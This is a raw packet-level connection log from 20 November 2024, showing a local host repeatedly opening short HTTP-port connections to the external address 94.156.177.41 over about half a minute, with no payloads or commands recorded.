Nov 20, 2024 10:12:23.270266056 CET	80	49219	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:23.270318031 CET	49219	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:23.277419090 CET	80	49219	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:23.405205965 CET	49220	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:23.413016081 CET	80	49220	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:23.413130045 CET	49220	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:23.414782047 CET	49220	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:23.419888973 CET	80	49220	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:23.419939041 CET	49220	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:23.425719023 CET	80	49220	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:24.148257971 CET	80	49220	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:24.148277044 CET	80	49220	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:24.148408890 CET	49220	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:24.148447037 CET	49220	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:24.155302048 CET	80	49220	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:24.289622068 CET	49221	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:24.297797918 CET	80	49221	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:24.297878027 CET	49221	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:24.299547911 CET	49221	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:24.307370901 CET	80	49221	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:24.307414055 CET	49221	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:24.312242985 CET	80	49221	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:25.196887970 CET	80	49221	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:25.196986914 CET	49221	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:25.197062969 CET	80	49221	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:25.197114944 CET	49221	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:25.204348087 CET	80	49221	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:25.336426973 CET	49222	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:25.346319914 CET	80	49222	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:25.346400023 CET	49222	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:25.348052025 CET	49222	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:25.356899023 CET	80	49222	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:25.356967926 CET	49222	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:25.366159916 CET	80	49222	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:26.119709969 CET	80	49222	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:26.119735956 CET	80	49222	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:26.119853020 CET	49222	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:26.120117903 CET	49222	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:26.125401020 CET	80	49222	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:26.257401943 CET	49223	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:26.264733076 CET	80	49223	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:26.264827013 CET	49223	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:26.266532898 CET	49223	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:26.273746014 CET	80	49223	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:26.273859978 CET	49223	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:26.281260967 CET	80	49223	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:27.018465996 CET	80	49223	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:27.018515110 CET	80	49223	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:27.018599987 CET	49223	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:27.018732071 CET	49223	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:27.026766062 CET	80	49223	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:27.146888971 CET	49224	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:27.154783964 CET	80	49224	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:27.154870033 CET	49224	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:27.156534910 CET	49224	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:27.165009975 CET	80	49224	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:27.165071964 CET	49224	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:27.173587084 CET	80	49224	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:27.971154928 CET	80	49224	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:27.971169949 CET	80	49224	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:27.971247911 CET	49224	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:27.971291065 CET	49224	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:27.977194071 CET	80	49224	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:28.098577023 CET	49225	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:28.103765965 CET	80	49225	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:28.103853941 CET	49225	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:28.105493069 CET	49225	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:28.110477924 CET	80	49225	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:28.110543013 CET	49225	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:28.115677118 CET	80	49225	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:28.854964018 CET	80	49225	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:28.855000019 CET	80	49225	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:28.855102062 CET	49225	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:28.855125904 CET	49225	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:28.862680912 CET	80	49225	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:28.986649036 CET	49226	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:28.991549969 CET	80	49226	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:28.991636038 CET	49226	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:28.993278980 CET	49226	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:28.999663115 CET	80	49226	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:28.999727964 CET	49226	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:29.006289959 CET	80	49226	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:29.827569008 CET	80	49226	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:29.827584982 CET	80	49226	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:29.827691078 CET	49226	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:29.827722073 CET	49226	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:29.833482981 CET	80	49226	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:29.952662945 CET	49227	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:29.958745003 CET	80	49227	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:29.958813906 CET	49227	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:29.960427999 CET	49227	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:29.966382980 CET	80	49227	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:29.966425896 CET	49227	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:29.972419977 CET	80	49227	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:30.830818892 CET	80	49227	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:30.830920935 CET	80	49227	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:30.830950975 CET	49227	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:30.830985069 CET	49227	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:30.836787939 CET	80	49227	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:30.970547915 CET	49228	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:30.975583076 CET	80	49228	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:30.975672960 CET	49228	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:30.977432966 CET	49228	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:30.982410908 CET	80	49228	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:30.982470036 CET	49228	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:30.987392902 CET	80	49228	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:31.861255884 CET	80	49228	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:31.861409903 CET	80	49228	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:31.861416101 CET	49228	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:31.861460924 CET	49228	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:31.866393089 CET	80	49228	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:32.009033918 CET	49229	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:32.015145063 CET	80	49229	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:32.015212059 CET	49229	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:32.017537117 CET	49229	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:32.023674965 CET	80	49229	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:32.023730993 CET	49229	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:32.029074907 CET	80	49229	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:32.776916981 CET	80	49229	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:32.777251005 CET	80	49229	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:32.777327061 CET	49229	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:32.797482967 CET	49229	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:32.804697990 CET	80	49229	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:32.959906101 CET	49230	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:32.964929104 CET	80	49230	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:32.965013027 CET	49230	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:32.967566013 CET	49230	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:32.972511053 CET	80	49230	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:32.972572088 CET	49230	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:32.977550030 CET	80	49230	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:33.728002071 CET	80	49230	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:33.728019953 CET	80	49230	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:33.728122950 CET	49230	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:33.728193045 CET	49230	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:33.734312057 CET	80	49230	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:33.879829884 CET	49231	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:33.885124922 CET	80	49231	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:33.885236025 CET	49231	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:33.886928082 CET	49231	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:33.891968012 CET	80	49231	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:33.892076015 CET	49231	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:33.897006035 CET	80	49231	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:34.632595062 CET	80	49231	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:34.632716894 CET	49231	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:34.633378029 CET	80	49231	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:34.633439064 CET	49231	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:34.652151108 CET	80	49231	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:34.759819984 CET	49232	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:34.767632008 CET	80	49232	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:34.767736912 CET	49232	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:34.769426107 CET	49232	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:34.777024031 CET	80	49232	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:34.777103901 CET	49232	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:34.784811020 CET	80	49232	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:35.505090952 CET	80	49232	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:35.505141973 CET	80	49232	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:35.505220890 CET	49232	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:35.505255938 CET	49232	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:35.510221004 CET	80	49232	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:35.633291006 CET	49233	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:35.638371944 CET	80	49233	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:35.638470888 CET	49233	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:35.640115976 CET	49233	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:35.645148039 CET	80	49233	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:35.645215988 CET	49233	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:35.650155067 CET	80	49233	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:36.375921011 CET	80	49233	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:36.376014948 CET	80	49233	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:36.376039028 CET	49233	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:36.376075983 CET	49233	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:36.382088900 CET	80	49233	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:36.508881092 CET	49234	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:36.514108896 CET	80	49234	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:36.514203072 CET	49234	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:36.515726089 CET	49234	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:36.520601988 CET	80	49234	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:36.520685911 CET	49234	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:36.525681019 CET	80	49234	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:37.246592045 CET	80	49234	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:37.246665955 CET	80	49234	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:37.246761084 CET	49234	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:37.247087002 CET	49234	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:37.254017115 CET	80	49234	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:37.379668951 CET	49235	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:37.384726048 CET	80	49235	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:37.384820938 CET	49235	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:37.386193991 CET	49235	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:37.391268969 CET	80	49235	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:37.391331911 CET	49235	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:37.396368980 CET	80	49235	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:38.148303986 CET	80	49235	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:38.148405075 CET	49235	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:38.148581028 CET	80	49235	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:38.148637056 CET	49235	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:38.156608105 CET	80	49235	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:38.283749104 CET	49236	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:38.288712025 CET	80	49236	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:38.288803101 CET	49236	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:38.290440083 CET	49236	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:38.295584917 CET	80	49236	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:38.295670033 CET	49236	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:38.303814888 CET	80	49236	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:39.034765005 CET	80	49236	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:39.034887075 CET	49236	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:39.035036087 CET	80	49236	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:39.035083055 CET	49236	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:39.040738106 CET	80	49236	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:39.177947998 CET	49237	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:39.183109045 CET	80	49237	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:39.183204889 CET	49237	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:39.184828997 CET	49237	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:39.189814091 CET	80	49237	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:39.189868927 CET	49237	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:39.194822073 CET	80	49237	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:40.082314014 CET	80	49237	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:40.082469940 CET	49237	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:40.082892895 CET	80	49237	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:40.082947016 CET	49237	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:40.087452888 CET	80	49237	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:40.219887972 CET	49238	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:40.228076935 CET	80	49238	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:40.228210926 CET	49238	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:40.229923010 CET	49238	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:40.238107920 CET	80	49238	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:40.238220930 CET	49238	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:40.243751049 CET	80	49238	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:40.998879910 CET	80	49238	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:40.998966932 CET	49238	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:40.999342918 CET	80	49238	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:40.999392986 CET	49238	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:41.006067038 CET	80	49238	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:41.137268066 CET	49239	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:41.142471075 CET	80	49239	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:41.142553091 CET	49239	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:41.144229889 CET	49239	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:41.149765968 CET	80	49239	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:41.149833918 CET	49239	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:41.155514002 CET	80	49239	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:41.926178932 CET	80	49239	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:41.926270008 CET	49239	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:41.926398993 CET	80	49239	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:41.926446915 CET	49239	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:41.933396101 CET	80	49239	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:42.063118935 CET	49240	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:42.068279982 CET	80	49240	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:42.068425894 CET	49240	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:42.070074081 CET	49240	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:42.074985027 CET	80	49240	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:42.075088978 CET	49240	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:42.080037117 CET	80	49240	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:42.939944983 CET	80	49240	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:42.940057993 CET	49240	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:42.940279961 CET	80	49240	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:42.940339088 CET	49240	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:42.947066069 CET	80	49240	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:43.075711966 CET	49241	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:43.082389116 CET	80	49241	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:43.082443953 CET	49241	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:43.084049940 CET	49241	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:43.090732098 CET	80	49241	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:43.090775013 CET	49241	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:43.096889973 CET	80	49241	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:43.960422993 CET	80	49241	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:43.960546970 CET	49241	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:43.960994005 CET	80	49241	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:43.961038113 CET	49241	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:43.965759993 CET	80	49241	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:44.287516117 CET	49242	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:44.293042898 CET	80	49242	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:44.293124914 CET	49242	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:44.314034939 CET	49242	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:44.334902048 CET	80	49242	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:44.335022926 CET	49242	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:44.342787027 CET	80	49242	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:45.162777901 CET	80	49242	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:45.163042068 CET	49242	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:45.163130999 CET	80	49242	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:45.163191080 CET	49242	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:45.167988062 CET	80	49242	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:45.290888071 CET	49243	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:45.297589064 CET	80	49243	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:45.297672987 CET	49243	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:45.299447060 CET	49243	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:45.306000948 CET	80	49243	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:45.306056023 CET	49243	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:45.312570095 CET	80	49243	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:46.061624050 CET	80	49243	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:46.061762094 CET	80	49243	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:46.061781883 CET	49243	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:46.061814070 CET	49243	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:46.066782951 CET	80	49243	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:46.192785978 CET	49244	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:46.197905064 CET	80	49244	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:46.197972059 CET	49244	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:46.221334934 CET	49244	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:46.228689909 CET	80	49244	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:46.228750944 CET	49244	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:46.236183882 CET	80	49244	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:46.951894999 CET	80	49244	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:46.952208996 CET	80	49244	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:46.952280998 CET	49244	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:46.960055113 CET	49244	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:46.968414068 CET	80	49244	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:47.282259941 CET	49245	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:47.290657043 CET	80	49245	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:47.290740967 CET	49245	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:47.292335987 CET	49245	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:47.300934076 CET	80	49245	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:47.301018000 CET	49245	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:47.309647083 CET	80	49245	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:48.035159111 CET	80	49245	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:48.035336971 CET	80	49245	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:48.035362959 CET	49245	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:48.035446882 CET	49245	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:48.042568922 CET	80	49245	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:48.185985088 CET	49246	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:48.191112995 CET	80	49246	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:48.191186905 CET	49246	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:48.193515062 CET	49246	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:48.198427916 CET	80	49246	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:48.198488951 CET	49246	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:48.206904888 CET	80	49246	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:48.943528891 CET	80	49246	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:48.943557024 CET	80	49246	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:48.943612099 CET	49246	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:48.943840981 CET	49246	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:48.948748112 CET	80	49246	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:49.092322111 CET	49247	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:49.097353935 CET	80	49247	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:49.097445965 CET	49247	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:49.099790096 CET	49247	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:49.104746103 CET	80	49247	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:49.104815006 CET	49247	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:49.109755993 CET	80	49247	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:50.032990932 CET	80	49247	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:50.033315897 CET	80	49247	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:50.033390999 CET	49247	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:50.033699989 CET	49247	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:50.039447069 CET	80	49247	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:50.245254993 CET	49248	80	192.168.2.22	94.156.177.41
